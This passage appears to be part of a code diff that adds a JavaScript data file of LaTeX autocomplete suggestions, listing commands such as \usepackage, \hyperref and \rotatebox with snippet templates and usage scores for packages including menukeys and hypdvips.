snippet: '\\ifthenelse{$1}', + meta: 'epsdice-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'epsdice-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'epsdice-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'epsdice-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'epsdice-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: 
'\\rotatebox[$1]{$2}{$3}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + ], + apptools: [ + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'apptools-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\AtAppendix{}', + snippet: '\\AtAppendix{$1}', + meta: 'apptools-cmd', + score: 8.82390883984482e-6, + }, + ], + letltxmacro: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'letltxmacro-cmd', + score: 0.008565354665444157, + }, + ], + menukeys: [ + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'menukeys-cmd', + score: 0.354445763583904, + }, + { + caption: '\\adjustbox{}{}', + snippet: '\\adjustbox{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.002008185536556013, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'menukeys-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'menukeys-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\usepackage{}', + snippet: '\\usepackage{$1}', + meta: 'menukeys-cmd', + score: 5.427890758130527, + }, + { + caption: '\\usepackage[]{}', + snippet: '\\usepackage[$1]{$2}', + meta: 'menukeys-cmd', + score: 5.427890758130527, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'menukeys-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'menukeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'menukeys-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'menukeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'menukeys-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'menukeys-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\mathlarger{}', + snippet: '\\mathlarger{$1}', + meta: 'menukeys-cmd', + score: 0.0031475241540308316, + }, + { + caption: '\\smaller', + snippet: '\\smaller', + meta: 'menukeys-cmd', + score: 0.001271007880944704, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 
'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'menukeys-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'menukeys-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'menukeys-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'menukeys-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'menukeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'menukeys-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'menukeys-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'menukeys-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'menukeys-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'menukeys-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'menukeys-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'menukeys-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'menukeys-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: 
'\\newrobustcmd{$1}[$2]{$3}', + meta: 'menukeys-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'menukeys-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'menukeys-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'menukeys-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'menukeys-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'menukeys-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'menukeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'menukeys-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'menukeys-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'menukeys-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'menukeys-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'menukeys-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'menukeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'menukeys-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'menukeys-cmd', + score: 0.2864294797053033, + }, + { + caption: 
'\\color{}', + snippet: '\\color{$1}', + meta: 'menukeys-cmd', + score: 0.2864294797053033, + }, + ], + hypdvips: [ + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'hypdvips-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'hypdvips-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'hypdvips-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'hypdvips-cmd', + score: 7.847906405228455, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'hypdvips-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\global', + snippet: '\\global', + meta: 'hypdvips-cmd', + score: 0.006609629561859019, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'hypdvips-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'hypdvips-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'hypdvips-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'hypdvips-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'hypdvips-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'hypdvips-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'hypdvips-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'hypdvips-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'hypdvips-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'hypdvips-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'hypdvips-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'hypdvips-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'hypdvips-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'hypdvips-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'hypdvips-cmd', + score: 
0.006492248863367502, + }, + { + caption: '\\figureautorefname', + snippet: '\\figureautorefname', + meta: 'hypdvips-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\figureautorefname{}', + snippet: '\\figureautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\footnoteautorefname', + snippet: '\\footnoteautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\roman{}', + snippet: '\\roman{$1}', + meta: 'hypdvips-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\roman', + snippet: '\\roman', + meta: 'hypdvips-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'hypdvips-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\MakeLowercase{}', + snippet: '\\MakeLowercase{$1}', + meta: 'hypdvips-cmd', + score: 0.017289599800633146, + }, + { + caption: '\\textunderscore', + snippet: '\\textunderscore', + meta: 'hypdvips-cmd', + score: 0.001509072212764015, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'hypdvips-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'hypdvips-cmd', + score: 7.849662248028187, + }, + { + caption: '\\FancyVerbLineautorefname', + snippet: '\\FancyVerbLineautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\hyperlink{}{}', + snippet: '\\hyperlink{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.00978652043902115, + }, + { + caption: '\\tableautorefname', + snippet: '\\tableautorefname', + meta: 'hypdvips-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\tableautorefname{}', + snippet: '\\tableautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\equationautorefname', + snippet: '\\equationautorefname', + meta: 'hypdvips-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\equationautorefname{}', + snippet: '\\equationautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\chapterautorefname', + snippet: '\\chapterautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'hypdvips-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'hypdvips-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'hypdvips-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\appendixautorefname', + snippet: '\\appendixautorefname', + meta: 'hypdvips-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\appendixautorefname{}', + snippet: '\\appendixautorefname{$1}', + meta: 'hypdvips-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\newlabel{}{}', + snippet: '\\newlabel{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.00029737672328168955, + }, + { + 
caption: '\\texorpdfstring{}{}', + snippet: '\\texorpdfstring{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.0073781967296121, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'hypdvips-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\alph', + snippet: '\\alph', + meta: 'hypdvips-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\alph{}', + snippet: '\\alph{$1}', + meta: 'hypdvips-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'hypdvips-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'hypdvips-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'hypdvips-cmd', + score: 3.800886892251021, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'hypdvips-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'hypdvips-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\itemautorefname', + snippet: '\\itemautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'hypdvips-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sectionautorefname', + snippet: '\\sectionautorefname', + meta: 'hypdvips-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\sectionautorefname{}', + snippet: '\\sectionautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\LaTeXe', + snippet: '\\LaTeXe', + meta: 'hypdvips-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\LaTeXe{}', + snippet: '\\LaTeXe{$1}', + meta: 'hypdvips-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'hypdvips-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'hypdvips-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\hypertarget{}{}', + snippet: '\\hypertarget{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.009652820108904094, + }, + { + caption: '\\theoremautorefname', + snippet: '\\theoremautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'hypdvips-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\subparagraphautorefname', + snippet: '\\subparagraphautorefname', + meta: 'hypdvips-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'hypdvips-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'hypdvips-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'hypdvips-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\href{}{}', + snippet: '\\href{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.27111130260612365, + }, + { + caption: '\\Roman{}', + snippet: '\\Roman{$1}', + meta: 'hypdvips-cmd', + score: 0.0038703587462843594, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\autoref{}', + snippet: '\\autoref{$1}', + meta: 'hypdvips-cmd', + score: 0.03741172773691362, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'hypdvips-cmd', + score: 
0.0004995635515943437, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'hypdvips-cmd', + score: 7.847906405228455, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'hypdvips-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'hypdvips-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'hypdvips-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\partautorefname', + snippet: '\\partautorefname', + meta: 'hypdvips-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\Itemautorefname{}', + snippet: '\\Itemautorefname{$1}', + meta: 'hypdvips-cmd', + score: 6.006262128895586e-5, + }, + { + caption: '\\halign{}', + snippet: '\\halign{$1}', + meta: 'hypdvips-cmd', + score: 0.00017906650306643613, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'hypdvips-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\Alph{}', + snippet: '\\Alph{$1}', + meta: 'hypdvips-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\Alph', + snippet: '\\Alph', + meta: 'hypdvips-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'hypdvips-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\MP', + snippet: '\\MP', + meta: 'hypdvips-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\MP{}', + snippet: '\\MP{$1}', + meta: 'hypdvips-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\paragraphautorefname', + snippet: '\\paragraphautorefname', + meta: 'hypdvips-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\citeN{}', + snippet: '\\citeN{$1}', + meta: 'hypdvips-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\citeN', + snippet: '\\citeN', + meta: 'hypdvips-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\subsectionautorefname', + snippet: '\\subsectionautorefname', + meta: 'hypdvips-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\subsectionautorefname{}', + snippet: '\\subsectionautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\hyperref[]{}', + snippet: '\\hyperref[$1]{$2}', + meta: 'hypdvips-cmd', + score: 0.004515152477030062, + }, + { + caption: '\\arabic{}', + snippet: '\\arabic{$1}', + meta: 'hypdvips-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\arabic', + snippet: '\\arabic', + meta: 'hypdvips-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\newline', + snippet: '\\newline', + meta: 'hypdvips-cmd', + score: 0.3311721696201715, + }, + { + caption: '\\hypersetup{}', + snippet: '\\hypersetup{$1}', + meta: 'hypdvips-cmd', + score: 0.06967310843464661, + }, + { + caption: '\\subsubsectionautorefname', + snippet: '\\subsubsectionautorefname', + meta: 'hypdvips-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\subsubsectionautorefname{}', + snippet: '\\subsubsectionautorefname{$1}', + meta: 'hypdvips-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'hypdvips-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 
0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\bookmarkget{}', + snippet: '\\bookmarkget{$1}', + meta: 'hypdvips-cmd', + score: 0.00026847053008917257, + }, + { + caption: '\\bookmarksetup{}', + snippet: '\\bookmarksetup{$1}', + meta: 'hypdvips-cmd', + 